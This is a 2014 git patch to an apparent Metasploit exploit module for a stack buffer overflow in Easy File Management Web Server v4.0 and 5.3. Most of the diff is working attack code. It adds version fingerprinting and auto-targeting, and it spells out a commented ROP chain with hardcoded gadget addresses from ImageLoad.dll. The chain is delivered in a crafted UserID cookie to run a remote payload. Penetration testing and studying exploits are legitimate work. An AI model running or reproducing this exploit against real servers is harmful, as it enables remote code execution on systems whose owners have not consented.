From f1382af018a86a6a03f67bf499e64226ea4fc6d8 Mon Sep 17 00:00:00 2001 From: TecR0c Date: Wed, 11 Jun 2014 06:20:49 -0700 Subject: [PATCH] Added target 4.0 and cleaned up exploit --- .../windows/http/efs_fmws_userid_bof.rb | 100 ++++++++++++------ 1 file changed, 68 insertions(+), 32 deletions(-) diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index 234735fdfa..86c03c525f 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -12,12 +12,16 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Easy File Management Web Server v5.3 Stack Buffer Overflow', + 'Name' => 'Easy File Management Web Server v4.0/5.3 Stack Buffer Overflow', 'Description' => %q{ Easy File Management Web Server contains a stack buffer overflow condition that is triggered as user-supplied input is not properly - validated when handling the User ID cookie. This may allow a remote + validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code. + + This version exploits: + Easy File Management Web Server v4.0 + Easy File Management Web Server v5.3 }, 'Author' => [ @@ -48,12 +52,17 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - # Successfully tested efmws.exe (5.3.0.0) on: + # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on: # -- Microsoft Windows XP [Version 5.1.2600] # -- Microsoft Windows [Version 6.1.7600] # -- Microsoft Windows [Version 6.3.9600] - [ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ] - # PPR from ImageLoad.dll + ['Automatic Targeting', { 'auto' => true }], + ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }], + ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }], + # 0x10010101 = pop ebx > pop ecx > retn + # 0xA445ABCF = 0x514CF5 push esp > retn 0c + # 0xA4518472 = 0x457452 jmp esp + # From ImageLoad.dll ], 'DisclosureDate' => 'May 20 2014', 'DefaultTarget' => 0)) @@ -64,26 +73,40 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check + def get_version # # NOTE: Version 5.3 still reports "4.0" in the "Server" header # + #if target.name =~ /Automatic/ res = send_request_raw 'uri' => '/whatsnew.txt' - unless res + if res and res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ + version = $1 + vprint_status "#{peer} - Found version: #{version}" + return version + elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ + version = $1 + vprint_status "#{peer} - Based on Server header: #{version}" + return version + else + fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") + end + #end + end + + def check + + version = get_version + unless version vprint_status "#{peer} - No response to request" return Exploit::CheckCode::Unknown end - if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ - version = "#{$1}" - vprint_status "#{peer} - Found version: #{version}" - if version == "5.3" - return Exploit::CheckCode::Appears - end + if version == "5.3" + return Exploit::CheckCode::Appears end - if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ - return Exploit::CheckCode::Detected + if version == "4.0" + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end @@ -91,29 +114,42 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # - # Check if target doesn't appear to be vulnerable, if so exit - # NOTE: if reported as detected continue incase whatsnew.txt is not reachable + # Get target version to determine how to reach call/jmp esp # - unless check == Exploit::CheckCode::Appears || Exploit::CheckCode::Detected - fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws 5.3") + if target.name =~ /Automatic/ + version = get_version + if version =~ /5\.3/ + my_target = targets[1] + else version =~ /4\.0/ + my_target = targets[2] + end + else + my_target = target end # - # Fu to JMP ESP where payload lives - # NOTE: Opcode 'JMP ESP' only existed in V5.3 + # Check if target appears to be vulnerable, if not exit # - sploit = rand_text(80) - sploit << [0x1001D8C8].pack("V") - sploit << rand_text(280) - sploit << [target.ret].pack("V") - sploit << [0xA445ABCF].pack("V") - sploit << [0x10010125].pack("V") - sploit << [0x10022AAC].pack("V") - sploit << rand_text(8) - sploit << [0x1001A187].pack("V") - sploit << [0x1002466D].pack("V") + unless check == Exploit::CheckCode::Appears || check == Exploit::CheckCode::Detected + fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws v4.0/5.3") + end + + # + # Fu to reach where payload lives + # + + sploit = rand_text(80) # Junk + sploit << [0x1001D8C8].pack("V") # Push edx + sploit << rand_text(280) # Junk + sploit << [my_target.ret].pack("V") # Pop ebx > pop ecx > retn + sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp + sploit << [0x10010125].pack("V") # Contains 00000000 to pass the jnz instruction + sploit << [0x10022AAC].pack("V") # Mov eax,ebx > pop esi > pop ebx > retn + sploit << rand_text(8) # Filler + sploit << [0x1001A187].pack("V") # Add eax,5bffc883 > retn + sploit << [0x1002466D].pack("V") # Push eax > retn sploit << payload.encoded print_status "#{peer} - Trying target #{target.name}..." @@ -125,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;", - }, 5) + }, 1) end end